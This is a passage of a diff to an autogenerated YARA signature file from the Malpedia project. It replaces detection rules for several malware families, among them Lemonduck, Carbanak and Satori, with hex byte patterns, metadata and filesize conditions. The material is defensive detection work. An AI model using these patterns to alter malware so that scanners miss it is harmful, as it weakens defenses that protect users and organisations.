-		$sequence_3 = { 8b750c 56 e8???????? 6a08 }
-		$sequence_4 = { 50 68???????? 6a0d 68???????? }
-		$sequence_5 = { 51 6802020000 68???????? 50 }
-		$sequence_6 = { 7ce0 a1???????? 5e 85c0 }
-		$sequence_7 = { 7411 6a04 68???????? 68???????? }
-		$sequence_8 = { ffd6 8b0d???????? 894170 85c0 }
-		$sequence_9 = { ff15???????? 83c604 81fe???????? 7ce0 a1???????? }
-		$sequence_10 = { e8???????? 83c40c b8f6eeeeee 8b4df0 64890d00000000 }
-		$sequence_11 = { ffd6 8b0d???????? 898180000000 85c0 }
-		$sequence_12 = { 56 be???????? 8b06 85c0 740f 50 }
-		$sequence_13 = { ffd0 c745fcfeffffff e8???????? 33c0 }
-		$sequence_14 = { 6a01 68???????? ff35???????? ff15???????? ffd0 }
-		$sequence_15 = { 68???????? 6a00 6a00 ffd6 50 68???????? 6aff }
-		$sequence_16 = { 8b35???????? 83c404 6a00 68???????? 6aff 68???????? 6a00 }
-		$sequence_17 = { 6800010000 6a00 68???????? e8???????? 6800020000 }
-		$sequence_18 = { 488b15???????? 48c7c101000080 488b05???????? ff9038010000 }
-		$sequence_19 = { 4533c9 4533c0 ba00000080 488b0d???????? 488b05???????? }
-		$sequence_20 = { 488b0d???????? 488b05???????? ff5010 85c0 }
-		$sequence_21 = { 488b05???????? ff9040010000 90 4883c430 }
-		$sequence_22 = { 488b05???????? ff90e8000000 488b0d???????? 488b05???????? ff5028 48c705????????00000000 }
-		$sequence_23 = { 68???????? e8???????? 8b35???????? 83c404 6a00 }
-		$sequence_24 = { 4889442420 41b906000200 4533c0 488b15???????? 48c7c101000080 }
-		$sequence_25 = { 4883c428 c3 48890d???????? c3 48895c2410 }
-		$sequence_26 = { 488b05???????? ff90e8000000 ba10270000 488b0d???????? }
-		$sequence_27 = { 7cd5 68???????? e8???????? 8b4dfc }
-		$sequence_28 = { 6a00 ffd6 8b4dfc 5f 5e 33cd b8???????? }
-		$sequence_29 = { 53 68???????? ff35???????? ffd6 ffd0 85c0 }
-		$sequence_30 = { c20c00 6a02 ff74240c ff74240c e8???????? c20800 ff74240c }
-		$sequence_31 = { 8d55f8 52 50 8b08 ff5124 }
-		$sequence_32 = { e8???????? 8d0c36 51 50 68???????? e8???????? }
-		$sequence_33 = { 52 50 ff91f0000000 8bf0 }
-		$sequence_34 = { 33cc e8???????? 8be5 5d c3 e8???????? a1???????? }
-		$sequence_35 = { 6aff 50 6a00 6a00 ff15???????? 5e }
-		$sequence_36 = { 53 56 57 c745dce197af54 }
-		$sequence_37 = { 8b85ecfeffff 8b4df4 64890d00000000 5f 5e }
-		$sequence_38 = { 741f 6a07 68???????? e8???????? 85c0 7402 }
-		$sequence_39 = { 50 ff512c 8bf0 f7de 1bf6 }
-		$sequence_40 = { 57 894df0 ff15???????? 8945fc 8b45f0 8945f4 8b45f4 }
-		$sequence_41 = { 57 50 ff512c 8bce 8bd8 e8???????? 57 }
-		$sequence_42 = { 8b06 50 8b08 ff9180000000 8b06 }
-		$sequence_43 = { c644043c00 8854242c ff15???????? 8d7c2438 83c9ff }
-		$sequence_44 = { 7640 3bdf 753c 8b742448 a1???????? 85f6 7402 }
-		$sequence_45 = { f3aa 8a5c2411 8a442410 8ad3 }
-		$sequence_46 = { 740d 3cff 7409 fec8 8841ff b001 eb65 }
-		$sequence_47 = { 52 e8???????? 8d4624 8d4c2418 }
-		$sequence_48 = { 8b8c247c080000 e8???????? b907010000 33c0 8dbc243c040000 c7842464080000ffffffff f3ab }
-		$sequence_49 = { 741d 8b542428 8b44242c 0fbecb 03c2 8ae9 }
-		$sequence_50 = { 8915???????? 83fbfd 8935???????? 763b ff15???????? }
+		$sequence_0 = { 50 8d85d8fbffff 50 8d8d7cfbffff e8???????? 8b95ecfbffff c645fc18 }
+		$sequence_1 = { 50 51 ff7310 8d4b04 e8???????? 8b4b0c 8bd0 }
+		$sequence_2 = { 50 e8???????? 8b4508 83c028 8b4df4 64890d00000000 59 }
+		$sequence_3 = { 83f810 0f85a1000000 8d8544ffffff 50 8d4d94 e8???????? 53 }
+		$sequence_4 = { 56 e8???????? 8a4da0 ff759c 0fb6c1 66c1e108 660bc8 }
+		$sequence_5 = { 56 e8???????? 83c410 ff742420 53 56 e8???????? }
+		$sequence_6 = { 33880c040000 338f0c030000 339808040000 338e0c020000 338a0c010000 339f08030000 339e08020000 }
+		$sequence_7 = { 50 8d4dc4 e8???????? 8d45dc c645fc01 50 8d4e3c }
 
 	condition:
-		7 of them and filesize < 1586176
+		7 of them and filesize < 2744320
 }
-rule MALPEDIA_Win_Sombrat_Auto : FILE
+rule MALPEDIA_Win_Shapeshift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c91fe38-2a08-5223-9951-dfa72ae3e5ad"
+		id = "cabcac9b-3338-5cbf-966e-320365499be9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sombrat_auto.yar#L1-L152"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shapeshift_auto.yar#L1-L95"
 		license_url = "N/A"
-		logic_hash = "cbad5e11330408439cf135255bf75438d03367a5c47a9504ff97a59c98c52d54"
+		logic_hash = "4f13648d24cba1b4262131ef571d4233f5b7db53468eba6e1303bec367f02718"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122555,38 +122822,30 @@ rule MALPEDIA_Win_Sombrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 015f08 33c0 488b4c2470 4833cc }
-		$sequence_1 = { 016b08 488d05dc980500 41b9e7160000 4889442420 }
-		$sequence_2 = { 015f08 488bcf e8???????? 8bf0 }
-		$sequence_3 = { 016b08 33c0 e9???????? 33ff }
-		$sequence_4 = { 015f08 33c0 e9???????? 488b4760 }
-		$sequence_5 = { 015f08 83bfd800000016 0f856c020000 488b87c8000000 }
-		$sequence_6 = { 01448c20 48ffc1 493bc9 7cf1 }
-		$sequence_7 = { 0145f1 4533c9 4533c0 488b16 }
-		$sequence_8 = { 014114 8b7508 837df800 8b5df4 0f84c3feffff }
-		$sequence_9 = { 014620 ff36 114e24 8b442434 }
-		$sequence_10 = { 0144244a 894e0c ffb72c010000 ff15???????? }
-		$sequence_11 = { 0145e4 8b55f8 83c40c 294644 }
-		$sequence_12 = { 0000 e8???????? c70424???????? 8d5f0c }
-		$sequence_13 = { 01041e 8b4508 42 8d7308 }
-		$sequence_14 = { 014620 f6460c04 8945e0 742d 85c0 7429 8b4de4 }
-		$sequence_15 = { 014648 d3eb 018ec81b0000 c746044c3f0000 837df000 0f8461020000 }
+		$sequence_0 = { 0fbf05???????? 0fb680589a4100 884204 0fbf05???????? 0fb680589a4100 }
+		$sequence_1 = { 8bf8 83c404 b9???????? bb02000000 }
+		$sequence_2 = { 8bf0 85f6 74b3 803d????????01 }
+		$sequence_3 = { ffd7 51 8d85f8feffff 50 ff15???????? }
+		$sequence_4 = { e8???????? 8904bd38054200 85c0 7514 }
+		$sequence_5 = { 33d2 b93b110f00 f7f1 68???????? }
+		$sequence_6 = { 0f44f8 8d85fcfdffff 50 e8???????? 83c40c }
+		$sequence_7 = { ff15???????? 68???????? 6a00 ff15???????? 8bf0 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1466368
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Unidentified_087_Auto : FILE
+rule MALPEDIA_Win_Zardoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb2770ef-ba3c-5373-be21-3fb31c73a40c"
+		id = "0edcabb6-39f3-5cd6-ada5-74eb513ae7ba"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_087_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zardoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zardoor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "10f141206749e7e53bb829c93df64c19732ef1dad0c95b847ac5042b772c3c95"
+		logic_hash = "dcbde80565a6988222a931ad27e9d322a3f8d97571d82cdb176504031bc2daa5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122600,38 +122859,32 @@ rule MALPEDIA_Win_Unidentified_087_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bc3 4a8d1429 488d0c38 4d8bc4 4903d4 4c2bc5 4803cd }
-		$sequence_1 = { 488bce ff15???????? 90 e9???????? 66448928 44896c2460 ff15???????? }
-		$sequence_2 = { 7415 41b900800000 4533c0 488bd6 488bcf ff15???????? }
-		$sequence_3 = { bb01000000 4885f6 7415 41b900800000 }
-		$sequence_4 = { 488bc8 4c8d442460 418d542428 ff15???????? }
-		$sequence_5 = { 0fb77526 440fb74d24 89442460 894c2458 89542450 }
-		$sequence_6 = { 4d8bc4 ba08030000 ff15???????? e9???????? 4c8d4c2430 4533c0 }
-		$sequence_7 = { 4a8d0c28 4d8bc6 4803cd 4803d6 e8???????? 48837b1810 7205 }
-		$sequence_8 = { a1???????? 83f803 7409 83f801 0f8535fcffff 8b0d???????? }
-		$sequence_9 = { eb54 83460801 83560c00 8807 8b0e 8b5104 8b443238 }
-		$sequence_10 = { 7435 83e805 0f8510010000 a1???????? 8b4d10 }
-		$sequence_11 = { 83f804 0f8542010000 83ec1c 8bcc }
-		$sequence_12 = { 8d4db4 e8???????? 32c0 e9???????? 8b8d54ffffff 6aff }
-		$sequence_13 = { 50 c685fcfbffff00 e8???????? 8b5508 83c40c }
-		$sequence_14 = { 56 ff15???????? 85c0 75e7 eb0e 8d4c242c 51 }
-		$sequence_15 = { 0fb685e6feffff 0fb68de5feffff 52 0fb695e4feffff 50 }
+		$sequence_0 = { e8???????? 41b85a010000 488d1532a01000 488bcb e8???????? 83c8ff 488b5c2450 }
+		$sequence_1 = { e8???????? b801000000 eb34 c744242013010000 41b87e000000 eb0e c74424200b010000 }
+		$sequence_2 = { e8???????? 41b882000000 488d1520da0900 498bcd e8???????? 488b4308 4885c0 }
+		$sequence_3 = { eb38 488b97a0060000 eb28 488d0d9d3f1300 ba02000000 33c0 eb1f }
+		$sequence_4 = { e8???????? e9???????? ba2f000000 c74424285f020000 488d1d81f11200 41b8b3010000 488bcf }
+		$sequence_5 = { e8???????? 488bd8 4885c0 7417 488bcf e8???????? 488bfb }
+		$sequence_6 = { e8???????? 41b88b010000 488d1574a60f00 498bcf e8???????? 488b4c2458 488d1578faffff }
+		$sequence_7 = { ffc6 4883c302 eb95 488b9c2490000000 488bcb e8???????? 4803f8 }
+		$sequence_8 = { e8???????? 83c8ff e9???????? 448b8c24a0000000 4183f901 7468 4c8d0522000b00 }
+		$sequence_9 = { 488d4904 488d14c8 488b83a8000000 488990e0020000 488b83a8000000 488b8b88040000 488b80e0020000 }
 
 	condition:
-		7 of them and filesize < 462848
+		7 of them and filesize < 4376576
 }
-rule MALPEDIA_Win_Lemonduck_Auto : FILE
+rule MALPEDIA_Win_Lightrail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79120d9c-8a0d-5155-9a06-2a2421d4dbd2"
+		id = "a2a74e32-804b-5428-a5eb-18775f1f39d2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lemonduck_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightrail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightrail_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "54774a4a200c3b8a4ce7eb935c4745902b9f773eeb8d215043530b937c7a7753"
+		logic_hash = "ac0b981cc1c6ed97eba28af6c8430a26e5eab1fbb0f4ef4ac4d4556d0f8dc830"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122645,71 +122898,71 @@ rule MALPEDIA_Win_Lemonduck_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4c8d65c0 4c89642440 8918 33c0 89442434 eb02 }
-		$sequence_1 = { 90 33c9 48894dd0 48894dd8 41bf05040000 6644897dde 488b4dd8 }
-		$sequence_2 = { eb03 0f57c9 488b05???????? f20f110d???????? 4885c0 7422 488d157ddf0000 }
-		$sequence_3 = { ffe0 488d0503f60a00 c3 488d05e3f50a00 c3 488d05c3f50a00 c3 }
-		$sequence_4 = { b83f000000 e9???????? 4898 498b0cc7 48890d???????? 488d153f9d1500 c744242000000000 }
-		$sequence_5 = { f30f6f4ff0 4c8d4d90 4889442440 4c8d4580 660fefc2 488d442450 660fefcb }
-		$sequence_6 = { e8???????? 90 e8???????? 90 e8???????? cc 4c8bdc }
-		$sequence_7 = { e8???????? 488b8fb8000000 e8???????? 488b8fc0000000 e8???????? 488b8fc8000000 e8???????? }
-		$sequence_8 = { 66410fefc9 f3430f7f0c2a 660f6f4590 660f38dc442440 660f7f4590 66410fefc2 f30f7f00 }
-		$sequence_9 = { eb22 488d1d912c1400 eb19 488d1d702c1400 eb10 488d1d9f2c1400 eb07 }
+		$sequence_0 = { 8d48bf 6683f919 7707 6683c020 668902 0fb74202 4883c202 }
+		$sequence_1 = { 6683c020 668902 0fb74202 4883c202 6685c0 }
+		$sequence_2 = { 8bda 4c8d05927d0000 488bf9 488d1550740000 b912000000 e8???????? }
+		$sequence_3 = { 776a e8???????? 85c0 7428 85db 7524 488d0d36720100 }
+		$sequence_4 = { eb49 8a07 4c8d05d354ffff 4b8b8ce010a70100 ffc3 895d9b }
+		$sequence_5 = { 03d8 0fb601 85c0 75f0 0fb6442430 488d4c2430 81f344434241 }
+		$sequence_6 = { 8d42ff 3bc8 72e6 8d42ff 41894008 }
+		$sequence_7 = { c745e86c6c0000 488d4de0 ffd0 488bd8 4885db 7504 33c0 }
+		$sequence_8 = { 488d3d4e260100 eb10 488d3d55260100 eb07 }
+		$sequence_9 = { ff9660020000 e9???????? 4883f902 0f85a1feffff }
 
 	condition:
-		7 of them and filesize < 10011648
+		7 of them and filesize < 249856
 }
-rule MALPEDIA_Win_Sidetwist_Auto : FILE
+rule MALPEDIA_Win_Wipbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "234f5e67-21ea-563f-a765-16d670746925"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sidetwist_auto.yar#L1-L134"
+		id = "285c0b10-9c1f-573b-962d-50c3932d3768"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wipbot_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "5b593ac062a3ee588643c8e2045ef28da674c3f54189c5d0eebe42dcfcc6f71f"
+		logic_hash = "194fd4449423e13c04280571bb64d77c07b6c4746542edc34cc7c2636335ecb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c644244600 4839d0 0f833a020000 488b4c2450 837c2458ff 0f94c0 4885c9 }
-		$sequence_1 = { e8???????? 807e2000 48898424b0000000 7412 488d8c24b0000000 ba20000000 e8???????? }
-		$sequence_2 = { 4488742457 0fb6442457 4c8db42494000000 4c8d4c2460 4889fa 4c89742440 488d8c2480000000 }
-		$sequence_3 = { 89c8 884520 807d2040 7612 807d205a 770c 0fb64520 }
-		$sequence_4 = { 896e18 4809c3 4889f8 488917 48895f08 4883c458 5b }
-		$sequence_5 = { bfffffffff 41bfffffffff e9???????? c644246c00 8844246e e9???????? 488b03 }
-		$sequence_6 = { 4c29cb 4c39c3 490f47d8 4885db 7411 480310 4883fb01 }
-		$sequence_7 = { 7218 4c8b05???????? 458b08 4585c9 755e 448b41f8 4585c0 }
-		$sequence_8 = { 89c7 440fb603 29df c1e702 4885c0 b800000000 0f44f8 }
-		$sequence_9 = { 6690 4885d2 7521 448b1e 4585db 0f8524020000 8b05???????? }
+		$sequence_0 = { 48 89cf 0f847f010000 48 8d4c2430 e8???????? }
+		$sequence_1 = { c68424a10200000b c68424a20200007b 31c0 c68424a302000069 c68424a402000060 c68424a50200007a c68424a60200000e }
+		$sequence_2 = { 48 8d0d86ffffff e8???????? 4c 8d442440 895c2420 }
+		$sequence_3 = { 89c7 7504 31c0 eb72 4c 8b03 4d }
+		$sequence_4 = { 48 ffc0 3211 83f22e 48 83f804 }
+		$sequence_5 = { 89c7 750c e8???????? 0d00005e00 eb45 48 8b442438 }
+		$sequence_6 = { 48 85c0 7437 45 31c9 }
+		$sequence_7 = { 66c704430000 b801000000 eb02 31c0 48 83c428 5b }
+		$sequence_8 = { ba08000000 48 89f9 41 ffd1 eb31 }
+		$sequence_9 = { 81ce00009f00 e9???????? 8b44bdc8 e8???????? }
 
 	condition:
-		7 of them and filesize < 2002944
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Wannahusky_Auto : FILE
+rule MALPEDIA_Elf_Satori_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2ad3b67-4e34-5409-83f1-3168450902fa"
+		id = "7bafa756-820c-5aa5-a514-aecea3797f7c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wannahusky_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.satori_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "77e82dda4e107ad0b0d473cd2e43d110eacdad7445bdb06e12858f482aa9bc9d"
+		logic_hash = "971903fb2922c6e0d29023431fedc1f613a69ac9544f2c3e1cb57d7bab55e6a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122723,32 +122976,32 @@ rule MALPEDIA_Win_Wannahusky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0c 3d00010000 19c9 f7d1 83e108 d3e8 0fbe80e0184100 }
-		$sequence_1 = { c7442404ffffffff c7042400000000 e8???????? 89d9 }
-		$sequence_2 = { 8b08 e8???????? 84c0 7449 c78554fbffff00000000 a1???????? }
-		$sequence_3 = { 7405 8b08 83c11a e8???????? ba???????? e8???????? }
-		$sequence_4 = { e9???????? 8b4dc0 394dbc 7212 }
-		$sequence_5 = { 66c705????????1101 c605????????01 c705????????2c000000 c705????????80ba4100 c705????????0c1e4100 }
-		$sequence_6 = { 8d57ff 89542404 e8???????? 8b45bc 8b4db8 }
-		$sequence_7 = { 89c1 58 5b 5d e9???????? 55 }
-		$sequence_8 = { c705????????78b54100 c705????????00000000 c705????????04000000 c705????????04000000 }
-		$sequence_9 = { c705????????14000000 c705????????00484200 c705????????b41d4100 c705????????30b54100 c705????????00000000 c705????????04000000 }
+		$sequence_0 = { 50 e8???????? c704241f000000 e8???????? c7042420000000 e8???????? c7042420000000 }
+		$sequence_1 = { ffb51c040000 e8???????? 83c420 6800400000 6a02 }
+		$sequence_2 = { 53 89cb 83ec0c 85c9 8b542420 }
+		$sequence_3 = { c784245809000000000000 fc 8dbc2438090000 31c0 ab ab }
+		$sequence_4 = { a1???????? 83f8ff 7431 83ec0c 50 e8???????? c705????????ffffffff }
+		$sequence_5 = { 7d02 89c2 c784243805000000000000 c78424340500000a000000 83ec0c }
+		$sequence_6 = { 888335040000 19c0 83e003 05a4000000 894304 89d8 }
+		$sequence_7 = { c685360400000b e9???????? 50 6800020000 6a00 8d8c2444060000 }
+		$sequence_8 = { 89ea b803000000 e8???????? 85c0 89442440 }
+		$sequence_9 = { 8884242e220000 8a84242d220000 c684242d22000030 8884242f220000 83ec0c 6a03 }
 
 	condition:
-		7 of them and filesize < 862208
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Lolsnif_Auto : FILE
+rule MALPEDIA_Win_Carbanak_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0289e06c-9994-5dbb-86c9-fe5c529484d1"
+		id = "34d24f6c-b1d1-51ed-9905-23e69a560a3f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lolsnif_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carbanak_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "722f048f7ac9bac7fbc30da76accd223a5f740835920efce86d99d762f17104c"
+		logic_hash = "fa6cd9a85a7bf81411d9c274df92be474253e26394edfb9f41f2cdb268401124"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122762,32 +123015,33 @@ rule MALPEDIA_Win_Lolsnif_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8908 eb20 bfd2100000 eb19 bfe8000000 eb12 81ff02010000 }
-		$sequence_1 = { eb03 897508 8b7d08 3bfe 745e 3bde 7411 }
-		$sequence_2 = { 754b 397c2434 742c a1???????? 8b401c 85c0 7506 }
-		$sequence_3 = { 8bc3 8935???????? e8???????? ff35???????? ff15???????? f605????????01 }
-		$sequence_4 = { ff35???????? ff15???????? 391d???????? 7405 e8???????? be6fd463aa 3935???????? }
-		$sequence_5 = { 50 8d45f4 50 53 6a03 e8???????? 3bc3 }
-		$sequence_6 = { ff75f4 6822010000 e9???????? 3d935aaf70 744d 3dd808c373 7437 }
-		$sequence_7 = { 7510 8d45e8 c745e880969800 897dec }
-		$sequence_8 = { 740b 83c704 43 83fb03 72ea eb05 }
-		$sequence_9 = { 53 57 8b3d???????? 56 ffd7 83c414 ff7510 }
+		$sequence_0 = { e9???????? 3d2c5c0700 750a e8???????? e9???????? }
+		$sequence_1 = { 85c0 7509 e8???????? b001 }
+		$sequence_2 = { 7c0d e8???????? 84c0 7504 33c0 }
+		$sequence_3 = { 7907 32c0 e9???????? 7507 b001 }
+		$sequence_4 = { ba31af8402 8d6b09 8bcd e8???????? 33d2 33c9 }
+		$sequence_5 = { 450f44fc e8???????? 488b8d20010000 ffd0 488d4c2460 }
+		$sequence_6 = { 4183c9ff 4d8bc7 488bc8 458d7921 418bd7 e8???????? }
+		$sequence_7 = { 8b8614020000 8b4d10 83c40c 40 69c084000000 890c30 }
+		$sequence_8 = { e8???????? 8b00 8b7004 eb0b c6043e00 46 }
+		$sequence_9 = { 8d8d2cfeffff e8???????? ff35???????? 8d45fc 50 e8???????? }
+		$sequence_10 = { 56 8b7510 8bc6 83e001 83e602 57 }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 658432
 }
-rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE
+rule MALPEDIA_Win_Parasite_Http_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6545d5ce-704c-5c00-a6cd-ec1b5c909576"
+		id = "b5a52ac1-7407-5488-8891-0827582e53ff"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mosaic_regressor_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.parasite_http_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "73c7fd14f8effd7ac9e0816b586de74eff8d0d21c8391e8e84f2921e57196fdb"
+		logic_hash = "b1b7675b20fef7b5b4abd1833972b96c480194b45d3d066a629b96c3dbbd6baa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122801,32 +123055,32 @@ rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 670010 386700 1023 d18a0688078a }
-		$sequence_1 = { 8975e0 8db1d0a70010 8975e4 eb2a }
-		$sequence_2 = { 85c0 7456 8b4de0 8d0c8de0b70010 8901 8305????????20 }
-		$sequence_3 = { f3a4 6a1c 8d8c2480060000 51 6a00 ffd5 8d842478060000 }
-		$sequence_4 = { 8d442460 50 6a00 ffd5 8d442458 48 8d4900 }
-		$sequence_5 = { 895008 8d542458 52 88480c }
-		$sequence_6 = { c744241444000000 8bc8 90 8a10 }
-		$sequence_7 = { 6a06 89430c 8d4310 8d89c4a70010 5a }
-		$sequence_8 = { 8bff 55 8bec 8b4508 ff34c578a10010 ff15???????? 5d }
-		$sequence_9 = { 6a00 6a00 6a00 8d942498080000 }
+		$sequence_0 = { 85c0 7509 8bce e8???????? ebe0 8bc6 5f }
+		$sequence_1 = { 85f6 5e 5b 750a 837dfc00 7504 33c0 }
+		$sequence_2 = { c745f8???????? c745fc???????? 8b4cb5e4 e8???????? 8bf8 85ff 7412 }
+		$sequence_3 = { 0f84e2000000 e8???????? bf50450000 85c0 7418 8b483c }
+		$sequence_4 = { be???????? 8bce e8???????? 8bd0 8bce e8???????? 8bf0 }
+		$sequence_5 = { 75fa 53 6800000008 6a40 8d45e8 894de8 }
+		$sequence_6 = { e8???????? 8bc8 e8???????? b900040000 8945f8 e8???????? 8b0d???????? }
+		$sequence_7 = { 57 85c0 7419 e8???????? 0345fc 59 50 }
+		$sequence_8 = { 33c0 b910040000 40 a3???????? 8d85dcfbffff 8818 40 }
+		$sequence_9 = { ffd0 5f 5e 5b 5d c20c00 53 }
 
 	condition:
-		7 of them and filesize < 113664
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Helminth_Auto : FILE
+rule MALPEDIA_Win_Attor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "379c192f-5a15-5f3b-ad5b-fc2b330bc750"
+		id = "28ef2855-ea16-5908-a1e2-a1862e0a74d3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.helminth_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.attor_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "274e3eea90d2e30111a5a8cd56771457195fff91f933a3b2952878df64a83186"
+		logic_hash = "de7f5a512e50826529d9df83eea4ee3f508c57e991d51c9dd6e574d86869905a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122840,37 +123094,38 @@ rule MALPEDIA_Win_Helminth_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 68e8030000 8907 e8???????? }
-		$sequence_1 = { 83e61f c1e606 8b0cbd70750110 f6440e0401 743d }
-		$sequence_2 = { 6685c0 75f4 a1???????? 8b15???????? }
-		$sequence_3 = { 6689440afe 6685c0 75f0 6a00 6880000000 6a04 6a00 }
-		$sequence_4 = { 33c0 5d c21000 803d????????00 56 8b7508 }
